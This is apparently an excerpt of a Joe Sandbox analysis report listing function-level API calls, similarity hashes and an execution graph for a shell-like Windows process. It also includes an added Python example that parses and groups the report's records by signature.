                                                      • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7E1DD827A), ref: 00007FF7E1DE11DC
                                                      • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7E1DD827A), ref: 00007FF7E1DE1277
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcessmemmovewcschr
                                                      • String ID: &()[]{}^=;!%'+,`~
                                                      • API String ID: 1135967885-381716982
                                                      • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                      • Instruction ID: 76d0ec533deeca2c78b9c57c0084b6da1bcb1a30bbfb05c67ab3dde323630600
                                                      • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                      • Instruction Fuzzy Hash: 9271E8B1E0824286D764EF15A48277AF6A0FB58799FC08237C94DC3B94CFBCE5558B12
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06D6
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06F0
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC074D
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC0762
                                                        • Part of subcall function 00007FF7E1DBEF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF000
                                                        • Part of subcall function 00007FF7E1DBEF40: wcschr.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF031
                                                        • Part of subcall function 00007FF7E1DBEF40: iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF0D6
                                                      • longjmp.MSVCRT ref: 00007FF7E1DCCCBC
                                                      • longjmp.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DCCCE0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                      • String ID: GeToken: (%x) '%s'
                                                      • API String ID: 3282654869-1994581435
                                                      • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                      • Instruction ID: e0be0b9d921e7c804d1516fc43eda6b6803a4ed953c19a68e4c7bdccdb5e752f
                                                      • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                      • Instruction Fuzzy Hash: 1061FF71A0964292FB14EB219452779E3E4AF447A4FD84A36CA1E077E4EEBCF440C362
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memmovewcsncmp
                                                      • String ID: 0123456789
                                                      • API String ID: 3879766669-2793719750
                                                      • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                      • Instruction ID: c400f9e57a7885dae6a9f656c2a12c6c4cb795ccdd1d112eeda0b8ffedd0689e
                                                      • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                      • Instruction Fuzzy Hash: 0441B622F1868E85EB29EF2598027BEB254FB44B81F949232DE4E87784DF7CD541C391
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DD97D0
  • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
  • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
  • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
  • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
  • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
  • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DD98D7
Strings: none listed
Memory Dump Source
• Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: the same six 00000003.00000002 dump regions listed with the first record of this module above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
• String ID: Software\Classes
• API String ID: 2714550308-1656466771
• Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
• Instruction ID: 7d6844fbf5e46a29ed5c686c3e7fbf3e0ba54c8f7b3fe6d1154a02658b931729
• Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
• Instruction Fuzzy Hash: C641A122A09752D1EB08EB16D447639A3A4FB44BD0F908232DA5E437E1DFBED846C351
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDA0FC
  • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
  • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
  • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
  • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
  • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
  • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDA1FB
Strings: none listed
Memory Dump Source
• Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: the same six 00000003.00000002 dump regions listed with the first record of this module above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
• String ID: Software\Classes
• API String ID: 2714550308-1656466771
• Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
• Instruction ID: 0cdf16e2702bf4476457e81c190f198764873517e9d7ff200c2e9970eafac050
• Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
• Instruction Fuzzy Hash: 7A41C122A09B5291EB04EB25D446679A3A4FB447D0FD0C332DA5E437E1DFB9E846C351
APIs: none listed
Strings: none listed
Memory Dump Source
• Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: the same six 00000003.00000002 dump regions listed with the first record of this module above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
Similarity
• API ID: ConsoleTitle
• String ID: -
• API String ID: 3358957663-3695764949
• Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
• Instruction ID: 0cd3a84456ac453b714a8d37487b883b83d13ff4d6a8d57bb64b35d5efe4401e
• Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
• Instruction Fuzzy Hash: 7B31BE21A0874296EB04FB11A802778EAA4FF49B90FD84536CE1E077D5DFBCE451C766
APIs: none listed
Strings: none listed
Memory Dump Source
• Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: the same six 00000003.00000002 dump regions listed with the first record of this module above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
Similarity
• API ID: _wcsnicmpswscanf
• String ID: :EOF
• API String ID: 1534968528-551370653
• Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
• Instruction ID: 2d01179304bbf9fa4548cb77de255d9e64bba176bb420da9d8aa8353f27c9f5a
• Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
• Instruction Fuzzy Hash: E8319431E0864286FB14FB15A4423B8F6A0EF48B60FC48933DA5D46295DFBCE851C7A2
APIs: none listed
Strings: none listed
Memory Dump Source
• Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: the same six 00000003.00000002 dump regions listed with the first record of this module above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
Similarity
• API ID: _wcsnicmp
• String ID: /-Y
• API String ID: 1886669725-4274875248
• Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
• Instruction ID: 6318832a31ea5ecd237e8f84e8098e125a8c6a2dd529bcada0428324844fc794
• Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
• Instruction Fuzzy Hash: BD216D66E08655A1EB14EB429442778B6A1FB44FC0F848032DE8A47794DEBCE492E322
Strings: none listed
Memory Dump Source
• Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: the same six 00000003.00000002 dump regions listed with the first record of this module above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
Similarity
• API ID:
• String ID: 3$3
• API String ID: 0-2538865259
• Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
• Instruction ID: 15e4e2377db0bf05f138cde5718331c6110736e0716ade626e9b2591930cdf23
• Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
• Instruction Fuzzy Hash: 69018BB0D0A582AAF708FB20A882774F620BF49315FD40537C40F055A5CFBC69A4C663
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06D6
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06F0
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC074D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC0762
Memory Dump Source
• Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: the same six 00000003.00000002 dump regions listed with the first record of this module above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction ID: 8e685b6937952020c12e089b69927045cdd6f5b4d7e893a82159c8c06c237c6e
• Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction Fuzzy Hash: 43416D75A0964686EB18EB10E44227EF7A0FF49B40FD48436C64D03794DFBCA550CBA1
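The Similarity block of each record above (API ID, String ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes) carries the identifiers the IDA plugin reports for function similarity, and it is the part of a record worth machine-reading when comparing this module against other reports. The Python below is an added example, not part of the Joe Sandbox report or of the plugin: it parses records in the layout printed on this page and groups them by API String ID, which shows that the two RegOpenKeyExW/RegCloseKey functions (String ID Software\Classes) share a signature while having different Opcode IDs. The sample text is three of this report's own records with the identical Memory Dump Source lines left out; the regexes assume exactly this bullet, `Key: value` and `Name.Module ref: ADDR` layout, which is an assumption about the page rather than a documented format.

```python
"""Parse Joe Sandbox IDA-plugin function records and group them by the
Similarity identifiers.  Added example, not part of the report; the record
layout assumed here is the one printed on this page."""
import re
from collections import defaultdict

# Constructed sample: three records copied from this report, with the
# Memory Dump Source lines (identical for every record) left out.
SAMPLE = """\
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DD97D0
  • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DD98D7
Strings
Similarity
• API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
• String ID: Software\\Classes
• API String ID: 2714550308-1656466771
• Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
• Instruction ID: 7d6844fbf5e46a29ed5c686c3e7fbf3e0ba54c8f7b3fe6d1154a02658b931729
• Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
• Instruction Fuzzy Hash: C641A122A09752D1EB08EB16D447639A3A4FB44BD0F908232DA5E437E1DFBED846C351
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDA0FC
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDA1FB
Strings
Similarity
• API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
• String ID: Software\\Classes
• API String ID: 2714550308-1656466771
• Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
• Instruction ID: 0cdf16e2702bf4476457e81c190f198764873517e9d7ff200c2e9970eafac050
• Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
• Instruction Fuzzy Hash: 7A41C122A09B5291EB04EB25D446679A3A4FB447D0FD0C332DA5E437E1DFB9E846C351
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06D6
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06F0
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction ID: 8e685b6937952020c12e089b69927045cdd6f5b4d7e893a82159c8c06c237c6e
• Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction Fuzzy Hash: 43416D75A0964686EB18EB10E44227EF7A0FF49B40FD48436C64D03794DFBCA550CBA1
"""

# "• Key: value" lines of the Similarity / Memory Dump Source blocks.
KV_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
# Direct API references: "• Name.Module[(args)], ref: ADDR".  Subcall lines
# ("• Part of subcall function ...") do not fit this shape and are skipped.
API_RE = re.compile(
    r"^\s*•\s*(?P<name>[\w@?]+)\.(?P<module>[^\s(]+)(?:\([^)]*\))?,? ref: (?P<ref>[0-9A-F]+)$"
)


def parse_records(text):
    """Split report text into one dict per function.

    The plugin prints 'Instruction Fuzzy Hash' as the last field of every
    record, so that line closes a record.
    """
    records, cur = [], {"apis": []}
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur["apis"].append((m["name"], m["ref"]))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        cur[key] = val
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = {"apis": []}
    return records


def group_by_signature(records, field="API String ID"):
    """Group records by one Similarity field; records without it are dropped."""
    groups = defaultdict(list)
    for rec in records:
        if rec.get(field):
            groups[rec[field]].append(rec)
    return dict(groups)


def shared_signature_variants(records):
    """API String IDs reused by functions whose Opcode IDs differ.

    Same API/string signature with different opcode hashes means distinct
    code reaching the same APIs and strings; the two RegOpenKeyExW/RegCloseKey
    functions in this report are such a pair.
    """
    variants = {}
    for sig, recs in group_by_signature(records).items():
        opcodes = sorted({rec["Opcode ID"] for rec in recs})
        if len(recs) > 1 and len(opcodes) > 1:
            variants[sig] = opcodes
    return variants


if __name__ == "__main__":
    for sig, opcodes in shared_signature_variants(parse_records(SAMPLE)).items():
        print(f"{sig}: {len(opcodes)} opcode variants")
```

Run as a script it prints the one API String ID that two functions with different Opcode IDs share (2714550308-1656466771, the Software\Classes lookups); fed the full report text instead of SAMPLE, the same grouping lists every signature that recurs across the module.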

                                                      Execution Graph

Execution Coverage: 5.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1150
Total number of Limit Nodes: 32
execution_graph (the interactive graph widget, flattened by extraction into "id address [API names]" node entries and "id->id" edges; the dump is cut off after node 18307, so the graph is incomplete). Recoverable content, all addresses in the process-3 image based at 7ff7e1db0000:

• Root 7ff7e1dd9900 → 7ff7e1dbff70 (GetProcessHeap, RtlFreeHeap)
• Root 7ff7e1db6be0 → 7ff7e1dbcd90 (166 API calls) → _pipe, _dup, _dup2, _close, _get_osfhandle, DuplicateHandle, with error paths through 7ff7e1db3278 (166 API calls) and 7ff7e1dde91c (198 API calls); the pipe setup calls into 7ff7e1dbbe00 (647 API calls)
• 7ff7e1dbbe00 → 7ff7e1dbbff0 (wcschr; subcalls 7ff7e1dbc460 with 183 API calls, 7ff7e1dbd840 with 178, 7ff7e1dbb6b0 with 170), 7ff7e1dbc620 (GetConsoleTitleW, SetConsoleTitleW, wcschr, wcsncmp, towupper, ??_V@YAXPEAX, GetLastError; subcall 7ff7e1dbd3f0 with 223 API calls), 7ff7e1dbb0d8 (memset, _get_osfhandle, GetFileType, SetFilePointer, _dup, _dup2, _close, _vsnwprintf, wcsrchr, _wcsnicmp, SearchPathW), 7ff7e1db88a8 (_wcsicmp), 7ff7e1db71ec (_setjmp) and 7ff7e1dc5ad8
• 7ff7e1dc0a6c (273 API calls): memset, _wcsnicmp, _wcsicmp, wcschr, wcsrchr, GetDriveTypeW, GetFileAttributesW, NeedCurrentDirectoryForExePathW, GetLastError, ??_V@YAXPEAX
• 7ff7e1dc5ad8 → 7ff7e1dc0a6c → GetConsoleTitleW → 7ff7e1dc4224: InitializeProcThreadAttributeList → UpdateProcThreadAttribute → memset, GetStartupInfoW → 7ff7e1dc3a90; then 7ff7e1dbb900 (166 API calls) → 7ff7e1dc43bb → wcsrchr, lstrcmpW → either 7ff7e1dc5a68 (_get_osfhandle, SetConsoleMode) or 7ff7e1dd9044; 7ff7e1dc441a calls either CreateProcessW (7ff7e1dc442a) or CreateProcessAsUserW (7ff7e1dc4596), with GetLastError on the failure branches and _local_unwind at 7ff7e1dc4638; SetConsoleTitleW (7ff7e1dc5c3c) restores the title afterwards
CloseHandle 18304->18307 18305->18304 18317 7ff7e1dc468d 18306->18317 18308 7ff7e1dc498c 8 API calls 18307->18308 18309 7ff7e1dc44c5 18308->18309 18312 7ff7e1dc44cd 18309->18312 18309->18317 18310 7ff7e1dc47a3 18310->18087 18311 7ff7e1dc44f8 18311->18310 18313 7ff7e1dc4612 18311->18313 18315 7ff7e1dc5cb4 7 API calls 18311->18315 18312->18310 18312->18311 18331 7ff7e1dda250 33 API calls 18312->18331 18316 7ff7e1dc461c 18313->18316 18319 7ff7e1dc47e1 CloseHandle 18313->18319 18314 7ff7e1dbcd90 166 API calls 18318 7ff7e1dc4724 18314->18318 18320 7ff7e1dc4517 18315->18320 18322 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18316->18322 18317->18312 18317->18314 18321 7ff7e1dc472c _local_unwind 18318->18321 18328 7ff7e1dc473d 18318->18328 18319->18316 18323 7ff7e1dc33f0 _vsnwprintf 18320->18323 18321->18328 18324 7ff7e1dc47fa DeleteProcThreadAttributeList 18322->18324 18325 7ff7e1dc4544 18323->18325 18326 7ff7e1dc8f80 7 API calls 18324->18326 18327 7ff7e1dc498c 8 API calls 18325->18327 18329 7ff7e1dc4820 18326->18329 18330 7ff7e1dc4558 18327->18330 18332 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18328->18332 18329->18087 18333 7ff7e1dc4564 18330->18333 18334 7ff7e1dc47ae 18330->18334 18331->18311 18335 7ff7e1dc475b _local_unwind 18332->18335 18336 7ff7e1dc498c 8 API calls 18333->18336 18337 7ff7e1dc33f0 _vsnwprintf 18334->18337 18335->18312 18338 7ff7e1dc4577 18336->18338 18337->18313 18338->18316 18339 7ff7e1dc457f 18338->18339 18340 7ff7e1dda920 210 API calls 18339->18340 18341 7ff7e1dc4584 18340->18341 18341->18316 18346 7ff7e1db9737 18342->18346 18344 7ff7e1dbcd90 166 API calls 18344->18346 18345 7ff7e1db977d memset 18347 7ff7e1dbca40 17 API calls 18345->18347 18346->18344 18346->18345 18348 7ff7e1dcb7b3 18346->18348 18349 7ff7e1dcb76e 18346->18349 18351 7ff7e1dbb364 17 API calls 18346->18351 18358 7ff7e1dcb79a 18346->18358 18361 7ff7e1db986d 18346->18361 18398 7ff7e1dc1fac memset 18346->18398 18425 7ff7e1dbce10 18346->18425 18475 7ff7e1db96b4 18346->18475 18480 
7ff7e1dc5920 18346->18480 18347->18346 18350 7ff7e1db3278 166 API calls 18349->18350 18354 7ff7e1dcb787 18350->18354 18351->18346 18352 7ff7e1dc855c ??_V@YAXPEAX 18352->18348 18353 7ff7e1dcb795 18494 7ff7e1dd7694 18353->18494 18354->18353 18486 7ff7e1dde944 18354->18486 18358->18352 18362 7ff7e1db9880 ??_V@YAXPEAX 18361->18362 18363 7ff7e1db988c 18361->18363 18362->18363 18364 7ff7e1dc8f80 7 API calls 18363->18364 18365 7ff7e1db989d 18364->18365 18365->18087 18367 7ff7e1dc3aa4 18366->18367 18376 7ff7e1dc3b73 18366->18376 18367->18376 18393 7ff7e1dc09f4 18367->18393 18370 7ff7e1dbb900 166 API calls 18371 7ff7e1dc3ad0 18370->18371 18372 7ff7e1dc3ad8 wcsrchr 18371->18372 18375 7ff7e1dc3af4 18371->18375 18372->18375 18373 7ff7e1dc3b66 18374 7ff7e1dbff70 2 API calls 18373->18374 18374->18376 18375->18373 18377 7ff7e1dc3b2d _wcsnicmp 18375->18377 18376->18292 18377->18375 18380 7ff7e1dc3a90 170 API calls 18379->18380 18381 7ff7e1dd9064 18380->18381 18382 7ff7e1dd906e 18381->18382 18384 7ff7e1dd9083 18381->18384 18383 7ff7e1dc498c 8 API calls 18382->18383 18385 7ff7e1dd9081 18383->18385 18384->18384 18386 7ff7e1dbcd90 166 API calls 18384->18386 18385->18296 18387 7ff7e1dd909b 18386->18387 18387->18385 18388 7ff7e1dc498c 8 API calls 18387->18388 18389 7ff7e1dd90ec 18388->18389 18390 7ff7e1dbff70 2 API calls 18389->18390 18390->18385 18392 7ff7e1dced0a DeleteProcThreadAttributeList 18391->18392 18392->18285 18394 7ff7e1dc0a3c 18393->18394 18395 7ff7e1dc0a0b iswspace 18393->18395 18394->18370 18396 7ff7e1dc0a21 wcschr 18395->18396 18397 7ff7e1dc0a50 18395->18397 18396->18394 18396->18397 18397->18394 18397->18395 18397->18396 18400 7ff7e1dc203b 18398->18400 18399 7ff7e1dc20b0 18402 7ff7e1dc3060 171 API calls 18399->18402 18404 7ff7e1dc211c 18399->18404 18400->18399 18401 7ff7e1dc2094 18400->18401 18403 7ff7e1dc20a6 18401->18403 18405 7ff7e1db3278 166 API calls 18401->18405 18402->18404 18407 7ff7e1dc8f80 7 API calls 18403->18407 18404->18403 18500 7ff7e1dc2e44 18404->18500 
18405->18403 18408 7ff7e1dc2325 18407->18408 18408->18346 18409 7ff7e1dc2148 18409->18403 18505 7ff7e1dc2d70 18409->18505 18412 7ff7e1dbb900 166 API calls 18414 7ff7e1dc21d0 18412->18414 18413 7ff7e1dce04a ??_V@YAXPEAX 18413->18403 18414->18413 18415 7ff7e1dc22a4 ??_V@YAXPEAX 18414->18415 18416 7ff7e1dc221c wcsspn 18414->18416 18415->18403 18418 7ff7e1dbb900 166 API calls 18416->18418 18419 7ff7e1dc223b 18418->18419 18419->18413 18423 7ff7e1dc2252 18419->18423 18420 7ff7e1dc228f 18421 7ff7e1dbd3f0 223 API calls 18420->18421 18421->18415 18422 7ff7e1dce06d wcschr 18422->18423 18423->18420 18423->18422 18424 7ff7e1dce090 towupper 18423->18424 18424->18420 18424->18423 18463 7ff7e1dbd0f8 18425->18463 18474 7ff7e1dbce5b 18425->18474 18426 7ff7e1dc8f80 7 API calls 18429 7ff7e1dbd10a 18426->18429 18427 7ff7e1dcc860 18428 7ff7e1dcc97c 18427->18428 18431 7ff7e1ddee88 390 API calls 18427->18431 18430 7ff7e1dde9b4 197 API calls 18428->18430 18429->18346 18433 7ff7e1dcc981 longjmp 18430->18433 18434 7ff7e1dcc879 18431->18434 18435 7ff7e1dcc99a 18433->18435 18436 7ff7e1dcc882 EnterCriticalSection LeaveCriticalSection 18434->18436 18437 7ff7e1dcc95c 18434->18437 18440 7ff7e1dcc9b3 ??_V@YAXPEAX 18435->18440 18435->18463 18442 7ff7e1dbd0e3 18436->18442 18437->18428 18443 7ff7e1db96b4 186 API calls 18437->18443 18438 7ff7e1dbcd90 166 API calls 18438->18474 18440->18463 18441 7ff7e1dbceaa _tell 18444 7ff7e1dbd208 _close 18441->18444 18442->18346 18443->18437 18444->18474 18445 7ff7e1dcc9d5 18625 7ff7e1ddd610 18445->18625 18447 7ff7e1dbb900 166 API calls 18447->18474 18449 